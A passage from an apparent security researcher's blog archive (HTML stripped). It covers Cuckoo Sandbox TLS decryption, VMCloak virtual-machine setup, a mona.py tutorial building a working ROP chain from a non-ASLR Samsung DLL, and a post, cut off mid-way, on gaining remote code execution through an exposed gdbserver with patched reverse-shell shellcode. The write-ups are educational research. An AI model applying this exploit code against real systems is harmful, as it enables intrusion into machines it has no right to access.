/>least), and if we extract em>Server Hello/em> records from the PCAP file whichbr />links the em>Session IDs/em> to the em>server random/em>, thenbr />we can cross-reference this information to write the Master Secret file withbr />matching RSA Session ID and Master Secrets for each TLS session that wasbr />negotiated during the analysis in the VM. (Note that to cross-reference webr />extracted the server random in both scenarios, once from the Server Hellobr />record and once from the PRF “key expension” function call)./p>p>Fast forward various long nights debugging code, many changes and improvementsbr />to Cuckoo to be able to facilitate all of this in the first place, andbr />matching the various pieces of extracted information to each other, we finallybr />conclude with functionality in Cuckoo to dump a tlsmaster.txt file for eachbr />analysis./p>p>To recap some facts about this transparent approach:/p>ul>li>It does not require any special handling for the instrumented application,br /> just to the instrumented lsass.exe service./li>li>Cuckoo can decrypt any TLS/HTTPS stream that uses the Windows API to performbr /> the TLS/HTTPS encryption. Including those of Windows Update, etc./li>li>Since there is no need to proxy the traffic through some 3rd party tool, thebr /> PCAP file looks the same as it would without our transparent sniffer./li>li>As nothing happens with the TLS itself, applications that use Certificatebr /> Pinning are supported./li>/ul>p>Following a screenshot showing Wireshark with a PCAP containing decryptedbr />HTTPS traffic of an analysis going to the login page of the Dutch bankingbr />website ING using the latest Cuckoo Sandbox:/p>p>img altWireshark vs ING src/wp-posts/ing.png />/p>h1>HTTP/HTTPS replay tool/h1>p>Because I was not really able to find such code elsewhere, and because tsharkbr />falls under the em>not invented here/em> rule, I worked up a small Python projectbr />that a hrefhttps://github.com/jbremer/httpreplay>extracts HTTP and HTTPS streams/a> from a PCAP file withbr />according TLS Master Secrets file. To be fair, integrating a tool such asbr />tshark with a tool such as Cuckoo Sandbox is suboptimal, as naturally one ofbr />the future goals is to include decrypted https traffic in the Cuckoo reportsbr />without having to depend on tools like mitmproxy (due to the non-transparencybr />thing)./p>p>The final goal of em>httpreplay/em> will, as one might expect, be to transparentlybr />replay HTTP/HTTPS traffic from a PCAP file. At the moment this last step hasbr />not been implemented yet, though. Aside other goals this can be used tobr />reproduce and unittest analysis of certain websites with Cuckoo Sandbox,br />etc, etc./p>p>Quickly running the httpreplay tool on the same PCAP as shown earlier we findbr />the following output (just URLs of extracted HTTP/HTTPS streams):/p>p>pre classbrush: bash; title: ; notranslate title>$ python httpreplay.py dump.pcap tlsmaster.txthttp://mijn.ing.nl/https://mijn.ing.nl/internetbankieren/https://mijn.ing.nl/favicon.ico.../pre>/p>p>Some readers may note this tool is very similar to a thousand others in itsbr />field, one of which being a hrefhttps://github.com/omriher/CapTipper>CapTipper/a>, developed by our friends atbr />CheckPoint. At the moment the only added value of em>httpreplay/em> would be httpsbr />support (and perhaps proper TCP reassembly and the future goal of being ablebr />to operate multi-gigabyte files – in-memory loading and all that)./p>h1>Conclusion/h1>p>Knowledge about TLS was gained. Tools were reinvented. Cuckoo Sandbox gainedbr />some new tricks. I finally wrote another blogpost img srchttps://jbremer.org/wp-includes/images/smilies/icon_wink.gif alt;) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/mitm/#respond titleComment on Transparent MITM with Cuckoo Sandbox>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-230 --> article idpost-218 classpost-218 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/vmcloak2/ titlePermalink to VMCloak 0.2: Windows 7 Support relbookmark>VMCloak 0.2: Windows 7 Support/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/vmcloak2/ title10:56 am relbookmark>time classentry-date datetime2015-03-18T10:56:35+00:00 pubdate>March 18, 2015/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/vmcloak2/#respond titleComment on VMCloak 0.2: Windows 7 Support>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>VMCloak 0.2: Windows 7 Support/h1>p>A couple of months ago I a hrefhttp://jbremer.org/vmcloak>released/a> the first version ofbr />a hrefhttps://github.com/jbremer/vmcloak>VMCloak/a>, now it’s time for version em>0.2/em>. VMCloak is a tool forbr />automatically creating and configuring em>Virtual Machines/em> forbr />a hrefhttp://cuckoosandbox.org/>Cuckoo Sandbox/a>./p>h1>What’s new?/h1>p>In this version of VMCloak we introduce the long-awaited strong>Windows 7/strong>br />support. This means VMCloak can now automatically create and configurebr />Windows 7 virtual machines for Cuckoo Sandbox./p>h1>Usage/h1>p>Those who have used VMCloak in the past will see that creating Windows 7br />virtual machines is now just as easy as creating Windows XP virtual machines.br />Creating a Windows 7 virtual machine goes as follows:/p>p>pre classbrush: bash; title: ; notranslate title># Install the latest vmcloak.sudo pip install vmcloak --upgrade# Mount the Windows 7 Installer ISO.sudo mkdir -p /mnt/win7sudo mount -o loop,ro win7.iso /mnt/win7# Ensure VirtualBox hostonly adapter is up.vmcloak-vboxnet0# Create a Win7 VM with the name win7_0.# This will take about 15 to 20 minutes.vmcloak -r --win7x64 win7vm/pre>/p>p>Besides a couple of internal changes, the only thing that changed for Windowsbr />XP support is that you’ll now have to specify strong>–winxp/strong> when creating abr />Windows XP virtual machine, for example:/p>p>pre classbrush: bash; title: ; notranslate title>vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE/pre>/p>h1>32-bit vs 64-bit/h1>p>With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bitbr />and 64-bit Windows 7 installations. This mostly means that VMCloak willbr />install a 64-bit version of the .NET framework, the 64-bit version of thebr />Microsoft C Runtime, etc.br />For this to work, however, you’ll have to inform VMCloak that the 64-bitbr />libraries should be used instead of the 32-bit ones. This can either bebr />achieved by passing the strong>–x64/strong> flag to vmcloak, or by combining thebr />strong>–win7/strong> and strong>–x64/strong> flags straight into the strong>–win7x64/strong> flag./p>p>(The upcoming version of Cuckoo Sandbox, version 1.3, will supportbr />strong>64-bit analysis/strong>!)/p>h1>VMCloak Birds/h1>p>For those who want to deploy multiple virtual machines in a relatively shortbr />time window while preserving as many resources as possible might likebr />VMCloak’s strong>bird/strong> feature.br />VirtualBox has em>immutable/em> disks, disks that are created once and then neverbr />changed; any changes on top of the immutable disk are then written to a newbr />VirtualBox disk. VMCloak uses this to create a em>bird image/em> – a fullybr />installed and configured Windows installation. Creating a Virtual Machinebr />ready to be used by Cuckoo Sandbox out of this bird image then consists of abr />couple of steps:/p>ul>li>Create a new Virtual Machine./li>li>Attach the immutable bird image./li>li>Boot into Windows./li>li>Configure a unique static IP address for this VM./li>li>Run Cuckoo and take a snapshot of the VM./li>/ul>p>Naturally all these steps are handled by strong>vmcloak-clone/strong>./p>p>Bird images are strong>crucial/strong> when running a Cuckoo Sandbox instance with morebr />than a handful of VMs on one machine. Whereas creating a new VM with Windows 7br />installed, such as a bird image, takes about 15 minutes of time and almostbr />10gb of diskspace, creating a clone of a bird image takes less than a minutebr />and less than 1gb per clone.br />em>Note that you’ll still need the bird image, also after cloning!/em> (Basicallybr />instead of installing Windows 7 10 times for 10 VMs, the bird image allows youbr />to install Windows 7 once and then re-use this installation)./p>p>Following is a quick guide to setting up 10 VMs using a VMCloak bird. Runningbr />these commands should take up to half an hour to finish – just enough to gobr />for lunch./p>p>pre classbrush: bash; title: ; notranslate title># Create the 64-bit Windows 7 Bird.vmcloak -r --win7x64 --bird win7bird# Create 10 VMs.for i in {0..9}; do vmcloak-clone -r --bird win7bird win7_$idone/pre>/p>h1>What’s next?/h1>p>As always further cloaking the VMs is on the roadmap. If anyone has tricks &br />tips on known detection vectors that would be useful for VMCloak, please dobr />let me know. E.g., registry keys containing known values specific tobr />virtualization software, etc./p>p>Other than that, I’ve been working hard on 64-bit analysis for Cuckoo Sandboxbr />for a while now, so there’s that img srchttps://jbremer.org/wp-includes/images/smilies/icon_wink.gif alt;) classwp-smiley /> And a bunch of other new and upcomingbr />features in Cuckoo./p>h1>Contact/h1>p>For any questions or suggestions, please feel free tobr />a hrefmailto:jurriaanbremer_at_gmail_dot_com>reach out to me/a>./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/vmcloak2/#respond titleComment on VMCloak 0.2: Windows 7 Support>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-218 --> article idpost-214 classpost-214 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/vmcloak/ titlePermalink to VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox relbookmark>VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/vmcloak/ title7:50 am relbookmark>time classentry-date datetime2014-09-22T07:50:07+00:00 pubdate>September 22, 2014/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/vmcloak/#comments titleComment on VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>2/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>VMCloak: Automated Virtual Machine Generation and Cloaking/h1>p>Today I present you a tool that I’ve been working on for a while,br />a hrefhttp://vmcloak.org/>vmcloak/a>. For those of you familiar with a hrefhttp://cuckoosandbox.org/>Cuckoo Sandbox/a>br />and setting it up you’ll surely be aware of the pain that is strong>configuringbr />virtual machines/strong>./p>h1>VMCloak 101/h1>p>Somewhat complete documentation can be found at a hrefhttp://vmcloak.readthedocs.org/en/latest/>readthedocs.org/a>,br />however, a quick introduction of the related commands is of course thebr />easiest. (strong>Do note that VMCloak has mostly been tested on Ubuntu/Debian, sobr />other distributions might not work, yet./strong>)/p>p>Basically you need a few things to get started:/p>ul>li>vmcloak (strong>sudo pip install vmcloak/strong>)/li>li>Windows XP Installer ISO file/li>li>Windows XP Serial Key (that works with your installer!)/li>li>genisoimage & VirtualBox (strong>sudo apt-get install genisoimage virtualbox/strong>)/li>li>Two directories for VirtualBox files./li>/ul>p>First we have to a hrefhttp://vmcloak.readthedocs.org/en/latest/config.html#conf-mounted-iso>mount the windows installer ISO file/a>:/p>p>pre classbrush: bash; title: ; notranslate title>sudo mkdir -p /mnt/winxpsudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp/pre>/p>p>Now we have to a hrefhttp://vmcloak.readthedocs.org/en/latest/vbox.html>start vboxnet0 if it has not already been started/a>:/p>p>pre classbrush: bash; title: ; notranslate title># If this returns nothing, then vboxnet0 hasnt# been started.VBoxManage list hostonlyifs# Create vboxnet0 and assign the correct IP address.VBoxManage hostonlyif createVBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1/pre>/p>p>And then two directories are required – a directory where VirtualBox’ snapshotbr />files will be stored, and a directory where the VirtualBox harddisk files andbr />installer ISO files will be stored. Note that you might want to place thebr />snapshot files in a em>tmpfs/em> container to ensure VMs load pretty muchbr />instantly./p>p>pre classbrush: bash; title: ; notranslate title>mkdir ~/vms/ ~/vm-data//pre>/p>p>Having setup the mount directory, the hostonly interface, and the VirtualBoxbr />directories we’re now good to go with regards to creating our first VM withbr />VMCloak. It is recommended to use the strong>recommended settings/strong> by providingbr />the strong>-r/strong> switch. By default the hostonly IP address will be set tobr />192.168.56.101, however, if you intend to create multiple VMs then you’ll havebr />to give each VM a unique IP address (i.e., 192.168.56.102, 192.168.56.103,br />etc.) In order to automatically register the newly created VM with Cuckoobr />you’ll have to set the strong>cuckoo directory/strong> so we’ll do this as well./p>p>We’re now going to make a VM with the name strong>cuckoo1/strong> and the IP addressbr />strong>192.168.56.101/strong>:/p>p>pre classbrush: bash; title: ; notranslate title>vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \ --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \ --hostonly-ip 192.168.56.101 --cuckoo ~/cuckoo/ \ cuckoo1/pre>/p>p>The strong>-d/strong> switch causes vmcloak to spit out debugging messages which may bebr />helpful in some cases. This command will take strong>up to 30 minutes/strong> to finish -br />on the machines I’ve tested it’s usually less than or roughly 10 minutes./p>p>So.. get yourself something to drink, wait for a bit, and you should have abr />VM ready to be used by Cuckoo./p>h1>Allowing VMs full internet access/h1>p>It is possible to a hrefhttp://vmcloak.readthedocs.org/en/latest/network.html>give VMs full internet access/a>, even strong>after/strong>br />creating them, without modifying the VMs themselves. If your networkbr />configuration is “regular” (i.e., a working internet connection at eitherbr />strong>eth0/strong> or strong>wlan0/strong>) then you’ll only have to run one command:/p>p>pre classbrush: bash; title: ; notranslate title>sudo vmcloak-iptables/pre>/p>h1>TODO/h1>p>Of course this is a never-ending project and it’s still actively beingbr />developed img srchttps://jbremer.org/wp-includes/images/smilies/icon_wink.gif alt;) classwp-smiley /> Things on the TODO list include, but are not limited to:/p>ul>li>Windows 7 support/li>li>Further VM cloaking (making the VM as stealth as possible)/li>li>VMWare Workstation support/li>li>Support for installing Adobe / Microsoft Office / etc in the VM/li>li>Loads more../li>/ul>h1>Source/h1>p>Of course there’s an a hrefhttp://vmcloak.org/>official website/a> and naturally the source codebr />can be found on a hrefhttps://github.com/jbremer/vmcloak>github/a>./p>h1>Credits/h1>p>Further credits go to Thorsten Sick of a hrefhttp://avira.com/>Avira/a> and a special thanks tobr />a hrefhttp://avira.com/>Avira/a> and the a hrefhttp://www.ites-project.org/index_en.html>iTES Project/a> for supporting the development ofbr />this tool./p>p>So much for today! Hope the tool will be useful for people and if there arebr />any questions don’t hesitate to email me or so./p>p>ps: Please don’t tell me about using strong>vagrant/strong> or similar instead ofbr />something custom built unless you’ve actually used it together with Cuckoo img srchttps://jbremer.org/wp-includes/images/smilies/icon_razz.gif alt:P classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/vmcloak/#comments titleComment on VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>b>2/b> Replies/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-214 --> article idpost-209 classpost-209 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/mona-101-a-global-samsung-dll/ titlePermalink to Mona 101: a Global Samsung DLL relbookmark>Mona 101: a Global Samsung DLL/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/mona-101-a-global-samsung-dll/ title3:06 am relbookmark>time classentry-date datetime2013-12-08T03:06:19+00:00 pubdate>December 8, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/mona-101-a-global-samsung-dll/#comments titleComment on Mona 101: a Global Samsung DLL>1/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Mona 101: a Global Samsung DLL/h1>p>This blogpost will be just another 101 for a hrefhttp://redmine.corelan.be/projects/mona>mona.py/a>. There’s already abr />good introduction to / full documentation of mona a hrefhttps://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/>here/a>, includingbr />setting it up and running it for the first time. (Which is surprisingly easy,br />at least with Immunity Debugger – I haven’t tested mona with WinDBG.)/p>h1>Our target/h1>p>Well, it turns out that a dll called strong>WinCRT.dll/strong>, developed by Samsung andbr />distributed by default on at least a set of Samsung laptops, isbr />being loaded in every process that imports strong>user32.dll/strong> on my system.. Yay!br />Needless to say it doesn’t have em>ASLR/em> enabled, nor does it rebase by default.br />If you haven’t guessed its base address by now, then I’ll give you a hint;br />0×10000000. A copy of the DLL can be found a href/wp-posts/samsung-wincrt.dll>here/a> – naturally I’m notbr />responsible for whatever you do with it :p/p>p>Btw, the path of this Samsung DLL is:br />strong>C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll/strong>/p>h1>Generate some ROP/h1>p>After running any program which imports user32, such as the followingbr />MessageBox() program, we attach Immunity Debugger to it./p>p>pre classbrush: cpp; title: ; notranslate title>#include <windows.h>int main(){ MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);}/pre>/p>p>We run the following command and get our ROP chain after roughly 10 seconds:/p>p>pre classbrush: bash; title: ; notranslate title>!mona rop -m wincrt -rva/pre>/p>p>As documented in the tutorials that were linked earlier in this blogpost, thebr />strong>-m/strong> switch specifies the module to search, and strong>-rva/strong> gives a dump withbr />relative addresses to the base address. (In case you need an infoleak tobr />obtain the base address of your target module, rather than having a DLL that’sbr />being loaded on a static address.)/p>p>The ROP chain returned may look like the following, including some commentsbr />about what the registers should look like at the point that em>VirtualAlloc/em> isbr />invoked./p>p>pre classbrush: python; title: ; notranslate title>"""Register setup for VirtualAlloc() : EAX NOP (0x90909090) ECX flProtect (0x40) EDX flAllocationType (0x1000) EBX dwSize ESP lpAddress (automatic) EBP ReturnTo (ptr to jmp esp) ESI ptr to VirtualAlloc() EDI ROP NOP (RETN)"""def create_rop_chain(base_wincrt): # rop chain generated with mona.py rop_gadgets base_wincrt + 0x0000f128, # POP EAX # POP EBP # RETN WinCRT.dll base_wincrt + 0x0001f0a8, # ptr to &VirtualAlloc() IAT WinCRT.dll 0x41414141, # Filler (compensate) base_wincrt + 0x00005bff, # MOV EAX,DWORD PTR DS:EAX # ADD CL,CL # RETN 0x08 WinCRT.dll base_wincrt + 0x0000431d, # PUSH EAX # ADD AL,5F # POP ESI # RETN WinCRT.dll 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) base_wincrt + 0x0001a14e, # POP EBP # RETN WinCRT.dll 0x00000000, # & base_wincrt + 0x0000bd5b, # POP EBX # RETN WinCRT.dll 0x00000001, # 0x00000001-> ebx base_wincrt + 0x00005209, # POP EBX # RETN WinCRT.dll 0x00001000, # 0x00001000-> edx base_wincrt + 0x0001183c, # XOR EDX,EDX # RETN WinCRT.dll base_wincrt + 0x0001175e, # ADD EDX,EBX # POP EBX # RETN 0x10 WinCRT.dll 0x41414141, # Filler (compensate) base_wincrt + 0x000191b8, # POP ECX # RETN WinCRT.dll 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x41414141, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx base_wincrt + 0x0000f203, # POP EDI # RETN WinCRT.dll base_wincrt + 0x0000f204, # RETN (ROP NOP) WinCRT.dll base_wincrt + 0x0000f128, # POP EAX # POP EBP # RETN WinCRT.dll 0x90909090, # nop 0x41414141, # Filler (compensate) base_wincrt + 0x0000c27e, # PUSHAD # ADD AL,0 # RETN WinCRT.dll return .join(struct.pack(<I, _) for _ in rop_gadgets)# WinCRT.dll ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)base_wincrt 0x10000000rop_chain create_rop_chain(base_wincrt)/pre>/p>h1>Fixing the ROP chain/h1>p>Unfortunately mona makes some small mistakes, but that’s why it gives greatbr />feedback in the form of a href/wp-posts/samsung-rop.txt>em>rop.txt/em>/a> and a href/wp-posts/samsung-rop_suggestions.txt>em>rop_suggestions.txt/em>/a>./p>p>Now if you look closely at the generated ROP chain, while comparing them tobr />the notes about the required states of the registers for VirtualAlloc, thenbr />you’ll notice that some gadgets have to be shuffled around, and some are notbr />correct yet./p>p>Let’s analyze each register top-to-bottom from the provided register list inbr />order to see if they’re all set correctly. First we start with em>eax/em>./p>p>Eax is set to 0×90909090 at the end. However, it also sets em>ebp/em> to an invalidbr />value – register dependencies is something that mona doesn’t handle verybr />well yet, unfortunately. Anyway, it’s easier to replace this gadget than tobr />shuffle it around. I ended up replacing it by a “pop ecx ; retn” andbr />“mov eax, ecx ; retn” gadget, and moving it to an earlier place in the ROPbr />chain where ecx hasbr />not yet been assigned its final value. Ecx itself is already correct, it’ll bebr />set to 0×40 using the ‘original’ “pop ecx ; retn” gadget./p>p>Edx has to become 0×1000, for which mona has decided to use em>ebx/em> asbr />intermediate register. We can remove the first gadget that sets ebx, as itsbr />value is overwritten right away when executing the next gadget. (Which setsbr />ebx as well.)/p>p>Now mona handles em>esp/em> for us, so we don’t have to do anything there. The nextbr />register, em>ebp/em>, however, does need some extra work. The description tells usbr />it needs to point to a “jmp esp” gadget, but because there’s no such gadget inbr />our DLL mona sort of failed silently. (The comment doesn’t show an errorbr />message, but instead shows something that doesn’t make much sense.)/p>p>Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,br />we have to play around with mona some more.. We run the following commandbr />which is, again, documented a hrefhttps://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/>here/a>, and find the following gadget./p>p>pre classbrush: bash; title: ; notranslate title>!mona findwild -s "push esp#*#retn" -m wincrt0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn WinCRT.dll/pre>/p>h1>Finishing up/h1>p>So yeah, that’ll do for us img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> Patch the 0×00000000 value withbr />“base_wincrt + 0×00009558″ and em>ebp/em> is good to go. Finally, em>esi/em> and em>edi/em>br />have been handled correctly by mona. (Note that we don’t have to worry aboutbr />the value of eax in our custom “jmp esp” gadget, as this is executed rightbr />after the call to VirtualAlloc, and literally jumps to our shellcode.)/p>p>Having fixed the ROP chain, our final ROP chain including some MessageBox()br />shellcode, wrapped into a C file looks like a href/wp-posts/samsung.c>the following/a>. (Woah,br />somebody added C dumping support to mona yesterday!) In case you’re interestedbr />in the binary, to be ran when the DLL is loaded into memory, it can be foundbr />a href/wp-posts/samsung.exe>here/a>./p>h1>Conclusion/h1>p>This was the first time I tried mona and I’m genuinely happy about it. Verybr />easy to use and it did the job for me img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> Ah yeah, so anyone with thisbr />particular Samsung software on his computer.. how do I even.. I guess it’sbr />just “another one of those”./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/mona-101-a-global-samsung-dll/#comments titleComment on Mona 101: a Global Samsung DLL>b>1/b> Reply/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-209 --> article idpost-206 classpost-206 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/ titlePermalink to Turning arbitrary GDBserver sessions into RCE relbookmark>Turning arbitrary GDBserver sessions into RCE/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/ title11:45 am relbookmark>time classentry-date datetime2013-12-02T11:45:03+00:00 pubdate>December 2, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/#respond titleComment on Turning arbitrary GDBserver sessions into RCE>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Turning an arbitrary GDBserver sessions into RCE/h1>p>Today we’ll see how we can turn an arbitrary GDBserver remote debuggingbr />session into remote code execution. First of all, let’s assume gdbserver isbr />ran using the following command. We will also assume that the targetbr />architecture is Linux/x86, but you can port the technique to otherbr />architectures as needed./p>p>pre classbrush: bash; title: ; notranslate title>$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary/pre>/p>p>What happens is that gdbserver will serve as many remote debugging sessions asbr />possible while it’s running. That is, we can have as many remote debuggingbr />sessions as we like, until the gdbserver is killed (but only one at a time.)br />This makes sense, because if we are debugging a target, then we don’t want tobr />restart gdbserver every time we hit “run” in gdb./p>p>Let’s assume one were to run gdbserver in a screen, to prevent accidentalbr />connection resets resulting in losing the gdbserver session (assuming we’rebr />ssh’ing into a remote server.) Exactly this happened to me – I recently foundbr />out that there were still two (of my) gdbserver’s running in a screen frombr />when we were playing a CTF, almost em>two months/em> ago./p>p>Now anyone with the ip address and port number can attach to your gdbserver bybr />doing the following./p>p>pre classbrush: bash; title: ; notranslate title>$ gdb(gdb) target extended-remote host:portRemote debugging using host:port(gdb) run..Inferior 1 (process 42) exited normally/pre>/p>p>In order not to make the RCE not too easy, we’re going to assume that we don’tbr />have any symbols of the remote binaries, and that all addresses are ASLR’d. Inbr />other words, educational guessing of “main” is useless, and we won’t be ablebr />to do arbitrary function calls during debugging such as the following./p>p>pre classbrush: bash; title: ; notranslate title>(gdb) call system("/bin/sh")No symbol table is loaded. Use the "file" command./pre>/p>p>However, if we enter a breakpoint at an invalid address and run the debuggee,br />we get an error right before executing the very first instruction of thebr />process. This looks roughly like the following img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>p>pre classbrush: bash; title: ; notranslate title>(gdb) break *0Breakpoint 1 at 0x0(gdb) runStarting program:warning: Could not load vsyscall page because no executable was specifiedtry using the "file" command first.Warning:Cannot insert breakpoint 1.Error accessing memory address 0x0: Unknown error 18446744073709551615.(gdb) info reg eipeip 0xf7fe0850 0xf7fe0850/pre>/p>p>At this point the debuggee has been executed, and we’re able to inspect andbr />modify its state. We continue by removing our earlier breakpoint. Now it’sbr />time for the fun part./p>h2>Reverse Shell Shellcode/h2>p>After a bit of googling, I stumbled upon the a hrefhttp://www.exploit-db.com/exploits/25497/>following shellcode/a>. Thisbr />shellcode connects to an ip address and port of your choosing, and executesbr />/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcatbr />listening on the remote ip address and port, then it’ll get a connectionbr />request upon execution of the shellcode, and we can use it to run arbitrarybr />shell commands on the shellcodes machine, as if we had shell access. After anbr />initial test, this shellcode seemed to work on my x86_64 machine running abr />32-bit application. However, there’s a small problem with this shellcode. Ifbr />we look closely at the shellcode, we notice the following./p>p>pre classbrush: bash; title: ; notranslate title>804807b: 31 db xor ebx,ebx804807d: b3 02 mov bl,0x2..804808a: fe c3 inc bl..8048098: b1 03 mov cl,0x3804809a <dupfd>:804809a: fe c9 dec cl804809c: b0 3f mov al,0x3f804809e: cd 80 int 0x80 ; system call80480a0: 75 f8 jne 804809a/pre>/p>p>Investigating this system call further, we see that this is the a hrefhttp://syscalls.kernelgrok.com/>em>dup2/em>br />system call/a>. However, the ebx register, or em>old_fd/em>, seems to bebr />constant here – namely three. (I figured this out while brushing my teeth..)br />This is the default fd if you open your first file descriptor in a program,br />which is something we cannot assume, and is definitely not the case whenbr />running the debuggee under gdbserver. (E.g., this shellcode fails if you openbr />a file or socket before running it, because the fd of the socket allocated bybr />our shellcode will be four for example, instead of three.)/p>p>If we look further, we see that the esi register contains the fd numberbr />returned from the em>socket/em> system call. (Actually, this is the em>socketcall/em>br />system call with em>SOCKOP_socket/em> as operation, but that’s a minor detailbr />specific to Linux/x86.)/p>p>pre classbrush: bash; title: ; notranslate title>8048075: cd 80 int 0x80 ; socket()8048077: 89 c6 mov esi,eax ; esi fd..804808e: 6a 10 push 0x10 ; sizeof(sockaddr_in)8048090: 51 push ecx ; sockaddr_in *8048091: 56 push esi ; fd8048092: 89 e1 mov ecx,esp8048094: cd 80 int 0x80 ; connect()/pre>/p>p>Long story short, we want to preserve esi before the em>connect/em> system call,br />and store it into ebx after the system call. Thus ebx will contain the fd ofbr />our socket, and the system calls to em>dup2/em> will duplicate the correct fd intobr />stdin, stdout, and stderr. The following snippet shows the updates shellcode.br />This is the shellcode that we’re going to use./p>p>pre classbrush: bash; title: ; notranslate title>8048092: 89 e1 mov ecx,esp+ push esi ; push fd8048094: cd 80 int 0x80 ; connect()+ pop ebx ; pop fd into ebx8048096: 31 c9 xor ecx,ecx8048098: b1 03 mov cl,0x3/pre>/p>h2>Running the Shellcode/h2>p>All we have left to do is to patch the correct ip address and port into thebr />shellcode, namely that of our listening netcat instance (e.g., runningbr />“nc -vvv -l 9001″ on your favourite linux box), overwriting eip with thebr />shellcode, and finally, running it./p>p>For my exploit I’m using gdb’s Python bindings, as initially I had anotherbr />technique in mind, which required a bit more scripting. Following is thebr />final part of the code which generates the shellcode, overwrites it onto eip,br />and executes it. We have two em>continue/em> statements at the end, as thebr />shellcode will em>execv/em> into /bin/sh, after which we’ll get an error thatbr />gdbserver can’t read the memory of eip anymore, so we have to instructbr />gdbserver to continue past that error./p>p>pre 